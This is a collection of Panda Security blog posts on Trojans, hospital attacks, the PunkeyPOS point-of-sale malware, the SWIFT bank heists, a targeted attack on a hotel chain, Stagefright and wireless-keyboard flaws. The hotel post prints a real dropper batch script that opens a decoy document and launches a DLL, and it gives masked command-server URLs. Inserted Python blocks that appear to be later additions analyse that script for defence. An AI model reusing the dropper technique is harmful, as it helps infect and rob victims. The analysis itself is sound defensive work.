
They can remotely access and control my computer?


We are always talking about ransomware and the importance of keeping your corporate network protected, and we want to warn our readers about the popular Trojan attacks that are going after small and medium sized businesses. But how do you know when it’s a Trojan? How can you secure yourself against Trojans?

5 Things You Should Know

  1. They are malicious software programs designed to rob information or take control of the computer. These attacks target businesses that manage top-secret information.
  2. Trojans are the most popular type of malware and have been for years. Running closely behind them is Ransomware.
  3. Trojans seem harmless but as soon as they are executed they will damage systems and steal information.
  4. Most of them create backdoors and give unauthorized users remote access and control over your system…but they go unnoticed!
  5. Trojan horse: the professional trickster. It disguises itself as something it's not.

Trojans: Topping the Charts

Trojans make up the majority of the 227,000 malware samples that are detected daily by PandaLabs. Month after month, they continue to be in first place as the most created malware.

Increasing since the second quarter of 2016, Trojans currently make up 66.81% of the new malware samples created this quarter. Viruses make up 15.98% (Worms 11.01%, PUPs 4.22% and Adware/Spyware at 1.98%).

What do their creators want to achieve?

  • Steal personal and corporate information: bank information, passwords, security codes, etc.
  • Take photos with webcams, if there are any!
  • Erase the hard-drive.
  • Capture incoming and outgoing text messages.
  • Seize the call registry.
  • Access (consult, eliminate and modify) the address book.
  • Make calls and send SMS messages.
  • Use the GPS to figure out the geographic location of the device.

How can we protect ourselves from Trojans?

– Avoid downloading content from unfamiliar websites or sites with dubious reputations.

– Monitor downloads from p2p applications.

– Keep your advanced security solution updated. Install one of the Panda Solutions for Companies that best adapts to you and protect yourself from these dangers.

– Analyze your computer for free and make sure it’s Trojan free.

The post They can remotely access and control my computer? appeared first on Panda Security Mediacenter.

Panda Security Dissects the “Cyber-Pandemic”


Economic gain is the fuel that motivates cyber-criminals. Thousands of stolen credit cards, infected computers and POS terminals, and ransomed information are what cyber-criminals use to make large sums of money. The victims are in the line of fire, and they are willing to pay these ransoms in order to get their private information back.

Recently, we have seen particular cases of large scale attacks that are designed specifically for industries, like the hotel sector or certain financial institutions, but can you imagine what would happen if a hospital fell into the hands of a cyber-criminal? PandaLabs, Panda Security’s anti-malware laboratory, presents a new whitepaper, “The Cyber-Pandemic”, with examples of real threats that seem science fictional but can affect us all.

A History of Attacks

The healthcare industry is technologically advanced, but it also has huge security flaws, making it an easy target for cyber-criminals. Add to this the immense amount of highly sensitive information managed by hospitals, pharmacies and health insurance providers, and the high price it fetches on the black market, where a medical history is worth much more than a credit card, and it is easy to understand why this was the most attacked industry last year.

A Timeline of the Most Notorious Attacks

2008: The University of Utah Hospital and Clinics announced that the private information of 2.2 million of their patients had been compromised. The information was stored on backup tapes held by a subcontracted external employee who failed to comply with the established protocols.

2015: One of the most infamous attacks was aimed at Anthem, the second largest insurance company in the United States. In this attack 80 million customer records were stolen, including sensitive data such as Social Security numbers.

2016: The cyber-attack that hit the Hollywood Presbyterian Medical Center in Los Angeles left their employees without access to patient medical records, emails and other systems. As a result, some patients could not receive treatment and had to be transferred to other hospitals. What was the ransom? 3.7 million dollars.


They Can Hack Our Health

These attacks have demonstrated that cyber-criminals are capable of shutting down all hospital activity. When we take into account all the medical equipment that is connected to the network, we can imagine how this cyber-pandemic could affect any ordinary person.

In 2013, former U.S. Vice President Dick Cheney revealed that his doctors disabled wireless communication on his pacemaker because they saw that it was highly possible for someone to remotely attack his device if they wanted to. Globally known hackers have demonstrated how it is possible to remotely alter a portable insulin pump that is used by thousands of diabetics or how to remotely manipulate a pacemaker in order to send a life-threatening electric shock.

In a hospital room, everything from the belts that raise your feet to the infusion pump that injects your medicine is connected to a computer. To demonstrate how easy it is to access this equipment, a number of these machines were tested to alter the dose of medicine to lethal levels. This can be done on more than 400,000 of these pumps throughout the world that remain vulnerable.

How Can We Avoid These Attacks?

It is important to take note: paying a ransom does not guarantee that stolen documents or information will be returned. In none of these examples did the ransom payment ensure that the victim got their documents back. It is better to avoid the situation altogether. Here are some of PandaLabs' recommendations on how you can avoid a cyber-pandemic:

  • Depend on a cyber-security solution that has both advanced protection functionalities and is also able to detect and remedy possible threats.
  • There is something in common in all of the systems that were targeted in the attacks: a lack of control. What would have helped prevent these attacks is a cyber-security solution that is capable of controlling all running processes, in every machine, connected to the network.
  • Revise staff policies and control systems in order to adjust the privacy requirements and adapt them to available technology.
  • Keep all operating systems and company devices updated.

To help the Healthcare sector stay ahead of cyber-crime, Adaptive Defense 360 offers complete security to fight off attacks. Adaptive Defense 360 provides everything that your company may need to remedy known vulnerabilities.

Download this whitepaper and learn how to avoid a “Cyber-Pandemic”, here:

Download

Check out our Cyber-Pandemic Infographic


The post Panda Security Dissects the “Cyber-Pandemic” appeared first on Panda Security Mediacenter.

POS and Credit Cards: In the Line of Fire with “PunkeyPOS”


PandaLabs, Panda Security's anti-malware laboratory, has been working since May on an in-depth investigation related to Point of Sale (POS) terminals in restaurants across the United States. During this investigation a new malware sample was discovered, called PunkeyPOS, a malware variant that is able to access credit card data. PandaLabs has made this information available to American law enforcement so they can take the appropriate actions. Let's see what this is and how it operates.

How can they steal your card without touching your wallet?

PunkeyPOS runs seamlessly on all Windows operating systems. The cyber-criminal's plan is to install the malware on POS terminals in order to steal sensitive information such as account numbers, magnetic stripe contents (tracks) from bank cards, etc.

PunkeyPOS seems simple:

It installs a keylogger that is responsible for monitoring keystrokes, then it installs a RAM-scraper that is responsible for reading the memory of all processes running on the system.

Based on the information it captures, the malware performs a series of checks to determine what is valid and what isn't. Regarding the keystrokes, PunkeyPOS ignores all information other than credit card data. It is mostly interested in tracks 1 and 2 from the process memory obtained by RAM-scraping. POS terminals read this information from the cards' magnetic stripes, and the criminals can use it later to clone the cards.

Once the relevant information has been obtained, it is encrypted with the AES algorithm and forwarded to a remote web server, which is also the command and control (C&C) server. The encryption is meant to keep the card data from being spotted by anyone scanning the network traffic.

The command and control (C&C) server address can easily be obtained from this malware sample through reverse engineering or by analyzing its communications. The main page of the control panel requires a username and password to get access.


Follow the Trail to the Digital Pickpocketers

The cyber-criminals behind this attack haven’t been very careful. Since the server was not configured correctly, PandaLabs was able to access it without credentials.

Because of their neglect, PandaLabs was able to see where PunkeyPOS sends the stolen information. Besides giving access to the stolen data, the panel lets the cyber-criminals reinfect or update the current clients (POS bots).


The version of the analyzed PunkeyPOS sample is hardcoded: "2016-04-01". If we compare this sample with older versions, some from 2014, we can barely see any difference in the way it operates (in the References section of this article you can find links that go into more detail about how it works).

PandaLabs has been able to gain access to the PunkeyPOS control panel and has geolocated around 200 Point of Sale terminals that were compromised by this specific malware variant. Virtually all the victims are in the United States.


Taking into account how easy it is to sell this information on the black market, and how convenient it is to compromise these POS terminals anonymously through the internet, we are certain that cyber-criminals will be increasingly drawn to these terminals.

Protect your devices proactively from these types of attacks with an advanced cyber-security solution like Adaptive Defense. Real-time control of all inappropriate user operations is in your hands.

References:

http://krebsonsecurity.com/2016/06/slicing-into-a-point-of-sale-botnet/

https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/


The post POS and Credit Cards: In the Line of Fire with “PunkeyPOS” appeared first on Panda Security Mediacenter.

Billion Dollar Sting: A Financial Corporation’s Worst Nightmare


For years cybercriminals have focused on money, and most specifically on the financial system. For more than a decade they have mainly targeted the weakest link in the chain: the end user of online banking services. This approach has some benefits for the cybercriminals: poor security on the end user's side, small thefts that can go undetected for some time, etc. However, it also has some downsides: the need for money mules, having to find (and infect) a victim who uses one of the targeted banks, avoiding antimalware software, etc.

In other words, they can make a lot of money, but at the same time it will require a lot of effort from their side.

Where is the big money? In the financial institutions themselves. There is no arguing with that. However, it is hard to break into them, and even more complicated to understand how their specific internal systems work in order to fully compromise them, take the money and leave without a trace. It requires a great investment to gather all the intelligence needed for this kind of heist; it is not easy to perform and it might require several months, if not years, of careful planning. Still, it is worth it if 1 billion dollars can be stolen in just one hit.

This is basically what happened in February at the Bangladesh Central Bank, where attackers infected its systems with malware created specifically for this attack and tried to make fraudulent transfers totaling 951 million dollars. That money was in the account the Bangladesh Central Bank held at the Federal Reserve Bank of New York. Fortunately most of the transfers could be blocked, and "only" 81 million dollars were stolen. But this was not the only case.

Tien Phong Bank, a Vietnamese bank, suffered a similar attack in the last quarter of 2015. That time the cybercriminals also tried to make transfers through SWIFT, although the bank realized in time and halted the 1 million dollars in transfers already en route. And a few months earlier, in January 2015, a bank from Ecuador, Banco del Austro, was hit in a very similar way, and 9 million dollars were stolen.


What are the similarities among the three cases? Malware was used to perform the attack, and all the money transfers were made using the SWIFT network. SWIFT (Society for Worldwide Interbank Financial Telecommunication) is a cooperative society formed by thousands of financial institutions around the world. Founded in 1973, it provides different services to its members. The secure transfer of money among banks is one of the services offered and processed by the SWIFT network.

The biggest concern was whether the SWIFT network, which was believed to be secure, had been compromised. If that were the case, the entire financial system could be at risk. It looks like this was not the case, and SWIFT has issued a press release where it clearly states this: "the SWIFT network, core messaging services and software have not been compromised."

However, that depends on the point of view: cybercriminals successfully used the SWIFT network to perpetrate these heists. And they took the same approach as the one described at the beginning of this article: target the weakest link in the chain. SWIFT provides a safe environment, but at the end of the day each financial institution has its own internal system that communicates with the SWIFT network. In the same way that cybercriminals were targeting end customers with banking Trojans, now, instead of going after the SWIFT network, they are going after the banks connected to it. This means that, while we can say that the SWIFT network is safe so far, we can also say that there are potentially thousands of holes, as many as there are financial institutions connected to it.

How did these attacks happen exactly?

There are still many unknowns, and some of them will never be solved. These criminals have covered their tracks. In fact, the main purpose of one of the malware pieces used in the heist was to delete those tracks. One thing we know for sure: malware was used. How did it get in? There are two options: there was help from an insider, or it was an external attack through the Internet. Both seem plausible, even more so after we learned that the security infrastructure at the Bangladesh Central Bank was obviously not good enough.

If we take a deeper look at the Bangladesh incident, it was a highly sophisticated attack targeting the Bangladesh Central Bank specifically, but the way the malware is structured (using an external configuration file, which makes no sense if this was just a one-time job) suggests that we will find new victims. They will go after banks that have flaws or weaknesses in their security model, such as those that do not monitor the execution of software in their network, and so far the information we have on the other attacks confirms this hypothesis.

In its customer communication, SWIFT tells all the banks that their first priority should be to ensure that they have all preventative and detective measures in place to secure their environment.

So that’s easy, right? How can we ensure that? Is there anything at all that can be done to completely prevent any new heist?

Criminals will keep trying, and eventually they may succeed. Still, we know what they are after (money) and which computers they want to target (those connecting to the SWIFT network). Access to the SWIFT network is highly restricted: it can only be performed from certain computers, and only certain users are allowed access to them. Those computers have to be highly fortified, and we are not just talking about having updated software and using an antimalware solution.

Only pre-approved software should be allowed to execute on those computers. All executed processes have to be monitored in real time, logging everything that happens and looking for abnormal behavior. It does not matter whether the attack comes from the Internet or with the help of an insider: no unauthorized software can be allowed to execute on those terminals, and the allowed software has to be protected with anti-exploit technologies and monitored in real time in case some abnormal behavior takes place.

Of course, if some person has physical access to a target computer, at some point they could disable any security solution, which is not a problem by itself if you can get an alert about it on the console used by the security team. Is there any better indicator of compromise than someone tampering with the security software installed in a critical system?
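The two controls described above for a SWIFT-connected terminal, allowing only pre-approved software and treating tampering with the security software as an indicator of compromise, can be written down as a small policy engine. The following is an added example, not Panda Adaptive Defense or any product's logic: process-start events are checked against an allowlist of (path, SHA-256) pairs and stops of protected services raise a critical alert. All paths, hashes, service names and events are constructed for the example.

```python
"""
Application control plus tamper alerting for a SWIFT-connected workstation:
every process start is checked against an allowlist of (path, SHA-256) and
any stop of a protected security service raises an alert.
Added example of the control the article recommends; it is not Panda's
product, and the paths, hashes, service names and events are constructed.
"""
import hashlib


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed allowlist: hashes are of placeholder bytes, not real binaries.
# Keying on path AND hash means a replaced binary at a trusted path is caught.
ALLOWLIST = {
    r"C:\Program Files\SWIFT\Alliance\bin\alliance.exe": sha256_hex(b"alliance-build-1"),
    r"C:\Windows\System32\svchost.exe": sha256_hex(b"svchost-known-good"),
}
# Hypothetical service names an intruder would want stopped before acting.
PROTECTED_SERVICES = {"EndpointProtection", "EventLog"}


def evaluate(event: dict):
    """Return an alert dict for a bad event, or None when the event is allowed."""
    host = event["host"]
    if event["type"] == "service_stop":
        if event["service"] in PROTECTED_SERVICES:
            return {"severity": "critical", "action": "alert", "host": host,
                    "reason": f"protected service {event['service']} stopped by {event['user']}"}
        return None
    if event["type"] == "process_start":
        expected = ALLOWLIST.get(event["image"])
        if expected is None:
            return {"severity": "high", "action": "block", "host": host,
                    "reason": f"unlisted binary {event['image']} run by {event['user']}"}
        if expected != event["sha256"]:
            return {"severity": "critical", "action": "block", "host": host,
                    "reason": f"hash mismatch for {event['image']}"}
        return None
    return {"severity": "low", "action": "alert", "host": host,
            "reason": f"unknown event type {event['type']}"}


def evaluate_all(events: list) -> list:
    """Run the policy over a batch of sensor events and keep only the alerts."""
    return [a for a in (evaluate(e) for e in events) if a is not None]


# Constructed host-sensor events: one clean start, one unlisted binary from a
# user temp directory, one trusted path with the wrong hash, one service stop.
EVENTS = [
    {"type": "process_start", "host": "swift-ws-01", "user": "ops1",
     "image": r"C:\Program Files\SWIFT\Alliance\bin\alliance.exe",
     "sha256": sha256_hex(b"alliance-build-1")},
    {"type": "process_start", "host": "swift-ws-01", "user": "ops1",
     "image": r"C:\Users\ops1\AppData\Local\Temp\updater.exe",
     "sha256": sha256_hex(b"unknown-binary")},
    {"type": "process_start", "host": "swift-ws-01", "user": "SYSTEM",
     "image": r"C:\Windows\System32\svchost.exe",
     "sha256": sha256_hex(b"tampered-svchost")},
    {"type": "service_stop", "host": "swift-ws-01", "user": "admin2",
     "service": "EndpointProtection"},
]

if __name__ == "__main__":
    for alert in evaluate_all(EVENTS):
        print(alert["severity"].upper(), alert["action"], alert["reason"])
```

The default for anything not on the list is to block, which is what makes this application control rather than detection; the service-stop rule is the console alert the paragraph above asks for, and it fires regardless of whether the person stopping the service is an administrator.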

How to avoid these cyber-attacks

One of the most frustrating things that victims have to go through is not knowing how the incident happened. How did it happen? When did it start? For how long? What did the attackers do once the computers were compromised? Was any confidential information leaked? As an example, in the Bangladesh Central Bank case three pieces of malware could be recovered after the incident, but that is all that was left. The attackers probably used many other tools that were deleted, and the victim will never know anything about them.

Knowledge is power: being able to know how a security incident happened will help you fix any security weakness in your environment.

There are only a few solutions capable of delivering this level of service. Panda created Adaptive Defense for these types of cases, and we already have financial companies, governments and big corporations in different verticals (health, hotels, insurance, public utilities, etc.) actively using Panda Adaptive Defense. All of them suffer not just the regular cyber-attacks, but truly targeted attacks against their assets. We have shown some of them, such as the one targeting a luxury hotel chain a few weeks ago or the one against oil tankers.

Our conclusion after studying these attacks is that if those banks had had Panda Adaptive Defense on their SWIFT-connected terminals, the heist could have been stopped in time.

The post Billion Dollar Sting: A Financial Corporation’s Worst Nightmare appeared first on Panda Security Mediacenter.

Advanced Attacks against Hotel Chains: A practical example

Recently, we published a report where we discussed the numerous attacks on major hotel chains. The attacks were directed mainly towards credit card theft. Attackers do this by infecting point-of-sale terminals in these types of establishments. A few days ago, one of our Adaptive Defense 360 clients, a luxury hotel chain, suffered an attack. I wanted to take advantage of this opportunity to show how cyber-criminals are entering company networks.

We know that, in most cases, these types of attacks are initiated through an email with an attached file that compromises the victim’s computer, or a link to a page that uses vulnerabilities to achieve the attacker’s objective. In our client’s case, the attack began with an email message addressed to a hotel employee stating the attachment provided all the information needed to pay for a hotel stay at the end of May 2016.

The message contained a zipped file attachment, which when opened contained a file with a Microsoft Word icon. When the file was executed, it showed the following:


This is a hotel reservation form that is to be filled out by a customer, who has written their payment information for a stay at the end of May 2016. As you can see, it does not appear unusual. In fact, this document is identical to the ones this hotel employee sends to his customers (even the name is the same). But if we look closely, we will see that the file came from a zip: although it shows a Word icon, it is an executable file.

When you run it, three files are created on the disk and the first one runs:

– reader_sl.cmd

– ROCA.ING.docx

– adobeUpd.dll (MD5: A213E36D3869E626D4654BCE67F6760C)

The contents of the first file are shown below:

@echo off
start "" ROCA.ING.docx
Set xOS=x64
If "%PROCESSOR_ARCHITECTURE%"=="x86" If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86
IF "%xOS%" == "x64" (start "" C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll,Wenk)
IF "%xOS%" == "x86" (start "" C:\Windows\System32\rundll32.exe adobeUpd.dll,Wenk)
ping -n 12 localhost

As we can see, the first thing it does is open the Word document in order to complete the trick. Then adobeUpd.dll runs with the parameter "Wenk". While executing, it modifies the file, marks it as read-only and hidden, and creates an entry in the Windows registry so that it runs every time the computer is turned on.
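A dropper script like the one above is short enough to triage statically, and doing so is the quickest way to turn it into something to hunt for. The following is an added example, not Panda's tooling: it parses the batch file for what it launches, which DLL and export it hands to rundll32, and the "ping localhost" sleep idiom, then derives a verdict and a list of indicators. The sample script is reconstructed from the listing above (its file and export names are the article's); the scoring rules are the example's own.

```python
"""
Static triage of a dropper batch file like reader_sl.cmd: extract what it
launches, which DLL export it hands to rundll32 and the 'ping localhost'
sleep idiom, and turn that into indicators and a verdict an analyst can act on.
Added example, not Panda's tooling; the sample is reconstructed from the
article's listing and the scoring rules are this example's own.
"""
import re

SAMPLE_CMD = r'''@echo off
start "" ROCA.ING.docx
Set xOS=x64
If "%PROCESSOR_ARCHITECTURE%"=="x86" If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86
IF "%xOS%" == "x64" (start "" C:\Windows\SysWOW64\rundll32.exe adobeUpd.dll,Wenk)
IF "%xOS%" == "x86" (start "" C:\Windows\System32\rundll32.exe adobeUpd.dll,Wenk)
ping -n 12 localhost
'''

# start "<title>" <target>   -> what the script launches
START_RE = re.compile(r'\bstart\s+"[^"]*"\s+(\S+)', re.IGNORECASE)
# rundll32[.exe] <dll>,<export>
RUNDLL_RE = re.compile(r'rundll32(?:\.exe)?\s+([^\s,]+)\s*,\s*(\w+)', re.IGNORECASE)
# ping -n N localhost: the classic batch-file sleep (about N-1 seconds)
PING_SLEEP_RE = re.compile(r'\bping\s+-n\s+(\d+)\s+(?:localhost|127\.0\.0\.1)', re.IGNORECASE)
DECOY_EXT = (".doc", ".docx", ".pdf", ".xls", ".xlsx", ".rtf")


def triage_batch(text: str) -> dict:
    """Extract launch targets, DLL exports and sleeps; score the combination."""
    launched = [m.group(1) for m in START_RE.finditer(text)]
    dll_exports = sorted({(m.group(1), m.group(2)) for m in RUNDLL_RE.finditer(text)})
    sleeps = [int(m.group(1)) for m in PING_SLEEP_RE.finditer(text)]

    decoys = [f for f in launched if f.lower().endswith(DECOY_EXT)]
    # A DLL named without a directory is resolved from the script's working
    # directory (here, the unzipped attachment), not from a system path.
    relative_dlls = [d for d, _ in dll_exports if "\\" not in d and "/" not in d]

    reasons = []
    if decoys:
        reasons.append("opens a document as a decoy")
    if relative_dlls:
        reasons.append("rundll32 loads a DLL from the working directory")
    if sleeps:
        reasons.append("uses 'ping -n N localhost' as a sleep")
    return {
        "launched": launched,
        "dll_exports": dll_exports,
        "decoys": decoys,
        "sleep_seconds": [max(n - 1, 0) for n in sleeps],
        "reasons": reasons,
        "verdict": "dropper" if len(reasons) >= 2 else "review",
    }


def hunting_indicators(report: dict) -> list:
    """Bare filenames and DLL!export pairs worth searching for across the estate."""
    names = [f for f in report["launched"] if "\\" not in f]
    names += [f"{dll}!{exp}" for dll, exp in report["dll_exports"]]
    return sorted(set(names))


if __name__ == "__main__":
    report = triage_batch(SAMPLE_CMD)
    print(report["verdict"], report["reasons"])
    print("hunt for:", hunting_indicators(report))
```

The DLL!export pair is the most useful indicator here: rundll32 being handed a DLL from a user-writable directory with an unusual export name is something an EDR process-creation log can be queried for directly, independent of the file hash.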

It then contacts a specific URL:

http://www.************.ga/en/scripts/en.php?stream=lcc&user=iPmbzfAIRMFw

It downloads a file and checks whether it contains the user given in the URL parameter (iPmbzfAIRMFw). If there is a match, it attempts to download the file

http://www.************.ga/en/scripts/iPmbzfAIRMFw.jpg

When we try to download it, it is not available; it will not be on our customer's system either, as we blocked the infection attempt and the malware was not able to run there. The domain of the URL is exactly the same as our customer's, except that theirs ends in ".com" while the attackers registered the same name under Gabon's ".ga". This way, the similar domain name will not attract attention if the hotel's security team sees it while analyzing network traffic.

Even though the file iPmbzfAIRMFw.jpg is not available, if we look at the code of adobeUpd.dll we can see that it looks for a specific marker in this file, then decrypts the data from it and runs it as a PE (created as "Tempsystm").

Subsequently, adobeUpd.dll remains in a loop, connecting at random intervals of several minutes to:

http://www.************.ga/en/scripts/en.php?mode=OPR&uid=iPmbzfAIRMFw&type=YFm

As we see, this attack is directed specifically at this hotel chain. The criminals have already removed all traces of the server the malware connected to, and as we aborted the attack we can only speculate about what they were going to do next. In our experience, this type of attack seeks to compromise one computer in the victim's organization and then move laterally to reach its ultimate goal: the point-of-sale terminals that process credit card payments, as we have seen in so many other cases.

Traditional anti-virus does not work against this type of attack, since these are threats created specifically for one victim, and the attackers always make sure the malware is not detected by the signatures, proactive technologies, etc. that current anti-malware solutions have built in. That is why EDR (Endpoint Detection & Response) services equipped with advanced protection technology are vital for effective protection against these attacks.

The post Advanced Attacks against Hotel Chains: A practical example appeared first on Panda Security Mediacenter.

Uncovering the WhatsApp encryption


Avid WhatsApp users were the first to notice the new security changes the company put into action last week. Now your conversations on WhatsApp are safer thanks to end-to-end encryption. With this new security system, your messages travel safely from mobile to mobile, from your hands to the person on the other side of the message.

The notification appeared as a message inside the chat.

Say you are at your favorite coffee shop, sipping a hot drink, and you decide to connect to the Wi-Fi, but instead connect to a fake Wi-Fi network (hackers set up fake networks to gain access to your information, such as e-mail, passwords and other data).

In theory, cyber-criminals could steal your messages but it’d be pretty pointless without a decryption key. Breaking public keys, which are different for each message, would be both time-consuming and extremely complicated. Instead of juicy information, the third-party would see senseless characters in the place of the message.

The security measure reassures us that the content coming into our mobiles (i.e. text, photos, videos, files and voice recordings) is completely private.

But end-to-end encryption is not the solution to everything.

However, it is a giant step for the safety and quality of our chats.

Experts say there are several factors to consider:

  • To make the system work, all participants must have updated their WhatsApp. If one of the members of a group is still using an older version, the chats remain "unsafe".
  • This security measure ensures that messages travel from one mobile to another securely, but they remain vulnerable to attack if they are stored on the devices. Not all “smartphones” are the smartest: some don’t encrypt their content but most modern ones do by default or at least allow it as an option (ex. the latest iPhone or Lollipop by Android).
  • Sometimes the juiciest information is not in our messages themselves but in something called metadata, which is "data that provides information about other data": who called whom, when they called, for how long, etc. In the end, if your sensitive information ends up in the hands of a country's secret service or a judge, WhatsApp's parent company, Facebook, would be responsible for it. Do you trust them?


You should update your WhatsApp and enjoy the assurance of end-to-end encryption, but don't depend on it alone for your full protection and privacy. Although it is a definite upgrade in mobile security, by itself it is still an insufficient form of protection.


The post Uncovering the WhatsApp encryption appeared first on Panda Security Mediacenter.

They’ll hack your Android in T Minus 10 seconds


The word that scared all Google users last summer is back and worse than ever. Stagefright, now exploited by a new attack its creators have nicknamed Metaphor, is even more dangerous in its new version.

Much like its name suggests, Stagefright hides deep in the Android media library, unnoticed by Android users as they watch videos of cute puppies and crafty DIY hacks, all the while exposing themselves to its vulnerabilities.

How many devices are affected?

Now in its second swing, these Stagefright vulnerabilities have already affected hundreds of thousands of Android devices through holes in the multimedia library. More specifically, they have even affected those who use versions 5.0-5.1 (23.5% of affected Androids) and some using versions 2.2 and 4.0 (unsafe due to old terminals that had been exposed to previous viruses).

Google fights back

After the bugs’ discovery, Google implemented a series of bug-fixes and other security measures, even creating its own group of vulnerabilities to counter the attacks. Upgrades and patches were set up to make it more difficult for Stagefright to infiltrate an Android in a real attack.

Unfortunately, Metaphor has been able to dodge the protection mechanisms that were added to the more modern versions of Android. With this new exploit, as its own creators have shown, Stagefright can easily take control of devices as diverse and modern as the Nexus 5, Samsung Galaxy S5, LG G3 or HTC One.

So, how exactly does Stagefright break in?

Sneakily. The user does not even need to be using their smartphone during an attack. In the case of Stagefright, the attacker can gain access through a particular website (e.g. through a malicious video link received by email or MMS). In a proof of concept, an email with a corrupted video link promoting videos of kittens leads to a page that actually contains this material. The recipient has no way of knowing that, while the video is rendering, their Android is also being attacked. It can take as little as 10 to 15 seconds for the cyber-criminal to take control of the victim's terminal.


Metaphor's strategy is not exactly new. It largely relies on the attacks that were released last summer, when the holes were first discovered. However, today's danger lies in Stagefright's ability to bypass ASLR, the barrier Google raised in all versions of Android after 4.1. The problem is that this new threat affects not only older devices but also more modern ones. Even those running Android Lollipop 5.1, about 19% of all Android smartphones, are not safe.

No matter what, the best way to protect your Android from Stagefright and the risks associated with it is to keep your operating system as up to date as possible and install a good antivirus. If your phone has been left out of the recent updates, take caution: you should not browse pages unless they are fully trusted. Even those that promise photos of adorable, fluffy kittens.

Cyber-crooks can use your wireless mouse and keyboard!


Remember how the problems you had with the nightmare of tangled cables going in and out of your computer went away the day you discovered wireless devices? In fact, you swore never to touch a wired device again after buying a keyboard and mouse capable of communicating with your computer without needing to be physically connected to it. You even went as far as to replace your laptop’s touchpad with a mouse that communicates with your computer via a small USB connector as if by magic.

Well, we have news for you: A group of security experts have discovered that these devices, as convenient as they are, are not very safe. Cyber-criminals can take control of users’ computers remotely by exploiting flaws found in wireless keyboards and mice from seven major manufacturers (Logitech, Dell, Microsoft, HP, Amazon, Gigabyte and Lenovo).

The security hole affects millions of devices that use chips sold by the Norwegian firm Nordic Semiconductor. These chips allow devices to establish a short-wave radio communication with the target computer. Although these chips are capable of encryption, they require that vendors write their own firmware to implement that encryption and secure the connection between computers and peripheral devices. However, many companies don’t take the precaution to encrypt those communications.

And even if they did, it wouldn’t be much use. The companies that do encrypt their communications do not properly authenticate communicating devices, allowing rogue devices to inject unencrypted keystrokes over the same connection. Actually, the security experts that unveiled this vulnerability found several flaws in the firmware of the keyboards and mice that use those chips.


A simple and affordable USB adapter with an antenna and a laptop was all they needed to demonstrate that it is possible to interfere with the radio protocol used by these devices to communicate with their USB dongle and send commands to the target computer. To do that, the target computer must be relatively close to the antenna, although they have been able to control Lenovo wireless devices from 180 meters away.

So, any attacker that used the method discovered by these researchers could take over a computer without laying a finger on its mouse or keyboard. The commands sent by the hacker would be interpreted by the computer as coming from the legitimate device.

Now, what could an attacker that took advantage of this flaw actually do on the affected system? Nothing much, really. Even if they managed to access the targeted computer, they wouldn’t be able to see its screen, so even unlocking the computer would be a difficult task not knowing the relevant password.

According to these experts, if the computer were actually unlocked, the cyber-crook would be able to download malware that could allow them to take full control of the computer.

However, the attacker would only have the same privileges as the legitimate user. If the computer were in an office, for example, they probably wouldn’t have the necessary permissions to install malicious programs on it.

A Logitech spokesperson has already claimed that the "vulnerability would be complex to replicate" and "is therefore a difficult and unlikely path of attack." Despite that, the company has decided to develop a firmware update for the affected devices.

Similarly, Lenovo has announced that it will give users the option to replace the affected devices. Microsoft, however, has simply stated that it will launch an update as soon as possible.

This is not the first time that researchers have warned of the dangers of wireless keyboards and mice. Last year, renowned security expert Samy Kamkar developed KeySweeper, a keylogger hidden in a fake USB charger that logged the keystrokes typed on any Microsoft wireless keyboard. With the help of an Arduino board, anyone could build this keylogger and find out what others were typing.

This research is extremely significant as it demonstrates that millions of devices are vulnerable. Taking into account that it may encourage cyber-criminals to start doing some tests, it may be a good idea to start updating your devices’ firmware whenever possible, and even replace vulnerable keyboards and mice with wired peripherals or, better still, wireless devices that communicate with computers via Bluetooth.

Bear this in mind, however: as cyber-crooks need to be close to the target device to carry out this attack, it seems logical that they set their eyes on companies rather than home users. But don’t lower your guard: prevention is better than cure…

The post Cyber-crooks can use your wireless mouse and keyboard! appeared first on MediaCenter Panda Security.